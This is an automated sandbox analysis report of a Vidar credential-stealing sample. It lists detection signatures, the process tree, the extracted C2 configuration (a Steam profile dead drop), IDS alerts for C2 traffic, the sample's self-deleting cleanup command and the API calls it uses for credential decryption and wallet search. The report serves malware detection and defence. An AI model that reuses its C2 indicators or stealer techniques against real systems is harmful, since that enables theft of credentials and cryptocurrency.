Windows Analysis Report
UMrFwHyjUi.exe

Overview

General Information

Sample name: UMrFwHyjUi.exe (renamed because original name is a hash value)
Original sample name: 0d90ef55d1b1cb43ccb8fd30bbeba1a4.exe
Analysis ID: 1540306
MD5: 0d90ef55d1b1cb43ccb8fd30bbeba1a4
SHA1: 5230fea74e8c4dedda59cbcdd13a9bc7ad035ac0
SHA256: 13cf27504612ba911a324205db08dfa22cc42f3cb7e2600a69b65091ac528940
Tags: exe, user-abuse_ch

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • UMrFwHyjUi.exe (PID: 1004 cmdline: "C:\Users\user\Desktop\UMrFwHyjUi.exe" MD5: 0D90EF55D1B1CB43CCB8FD30BBEBA1A4)
    • UMrFwHyjUi.exe (PID: 4432 cmdline: "C:\Users\user\Desktop\UMrFwHyjUi.exe" MD5: 0D90EF55D1B1CB43CCB8FD30BBEBA1A4)
    • UMrFwHyjUi.exe (PID: 5768 cmdline: "C:\Users\user\Desktop\UMrFwHyjUi.exe" MD5: 0D90EF55D1B1CB43CCB8FD30BBEBA1A4)
      • cmd.exe (PID: 7976 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 8020 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 6636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 272 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199786602107"], "Botnet": "0b3bd69430b7d827b107ba2ed809207d"}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |
| 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |
| 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0.2.UMrFwHyjUi.exe.1c2c60.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0.2.UMrFwHyjUi.exe.1c2c60.1.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |
| 2.2.UMrFwHyjUi.exe.400000.2.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 2.2.UMrFwHyjUi.exe.400000.2.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |
| 0.2.UMrFwHyjUi.exe.1c2c60.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |

                          No Sigma rule has matched
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-23T17:05:26.076725+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:28.135906+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:29.688673+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:31.232344+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:32.791542+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:34.407637+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:35.663703+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:41.857068+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49753 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:56.315756+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:58.360770+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49762 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:00.539870+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49772 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:02.343684+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49782 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:06.824500+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49808 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:11.079987+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49833 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:14.862988+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49857 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:18.020599+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49874 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:20.034709+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49886 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:27.037332+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49922 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:28.315052+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49930 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:29.881096+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49941 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:31.473792+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49950 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:33.570468+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49963 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:36.063596+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49976 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:06:37.609359+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.4 | 49987 | 95.217.220.103 | 443 | TCP |
| 2024-10-23T17:05:31.883540+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 95.217.220.103 | 443 | 192.168.2.4 | 49749 | TCP |
| 2024-10-23T17:05:33.452370+0200 | 2051831 | 1 | Malware Command and Control Activity Detected | 95.217.220.103 | 443 | 192.168.2.4 | 49750 | TCP |
| 2024-10-23T17:05:33.452105+0200 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 95.217.220.103 | 443 | TCP |

                          AV Detection

Source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107"], "Botnet": "0b3bd69430b7d827b107ba2ed809207d"}
Source: UMrFwHyjUi.exe, ReversingLabs: Detection: 65%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: UMrFwHyjUi.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,2_2_004080A1
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00408048
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_00411E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00411E32
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_0040A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,2_2_0040A7AD
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBAA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6CBAA9A0
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBA44C0 PK11_PubEncrypt,2_2_6CBA44C0
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CB74420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,2_2_6CB74420
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBA4440 PK11_PrivDecrypt,2_2_6CBA4440
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBF25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,2_2_6CBF25B0
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CB8E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,2_2_6CB8E6E0
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CB88670 PK11_ExportEncryptedPrivKeyInfo,2_2_6CB88670
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBAA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,2_2_6CBAA650
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBCA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,2_2_6CBCA730
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBD0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,2_2_6CBD0180
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBA43B0 PK11_PubEncryptPKCS1,PR_SetError,2_2_6CBA43B0
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBC7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,2_2_6CBC7C00
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBCBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,2_2_6CBCBD30
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CB87D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,2_2_6CB87D60
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_6CBC9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,2_2_6CBC9EC0
Source: UMrFwHyjUi.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: UMrFwHyjUi.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.dr
                          Source: Binary string: freebl3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: freebl3.pdbp source: UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                          Source: Binary string: nss3.pdb@ source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.2.dr
                          Source: Binary string: softokn3.pdb@ source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2712188709.0000000035E57000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2705821873.0000000029F71000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                          Source: Binary string: nss3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.2.dr
                          Source: Binary string: mozglue.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694047636.000000001DC08000.00000002.00001000.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 0_2_001AD2FE FindFirstFileExW,0_2_001AD2FE
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 1_2_001AD2FE FindFirstFileExW,1_2_001AD2FE
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00416013
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041547D
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409CF1
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00414D08
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00401D80
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D59B
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B5B4
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040BF22
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B914
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00415B4D
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040CD0C
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 2_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00415182
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 4x nop then mov eax, dword ptr fs:[00000030h], 0_2_001C350D
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 4x nop then mov dword ptr [ebp-04h], eax, 0_2_001C350D
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 4x nop then mov eax, dword ptr fs:[00000030h], 2_2_004014AD
Source: C:\Users\user\Desktop\UMrFwHyjUi.exe, Code function: 4x nop then mov dword ptr [ebp-04h], eax, 2_2_004014AD

                          Networking

Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49750 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.217.220.103:443 -> 192.168.2.4:49750
Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.217.220.103:443 -> 192.168.2.4:49749
Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199786602107
Source: global traffic, HTTP traffic detected:
    GET /profiles/76561199786602107 HTTP/1.1
    Host: steamcommunity.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 92.122.104.90
Source: Joe Sandbox View, IP Address: 95.217.220.103
Source: Joe Sandbox View, ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49772 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49782 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49762 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49808 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49833 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49857 -> 95.217.220.103:443
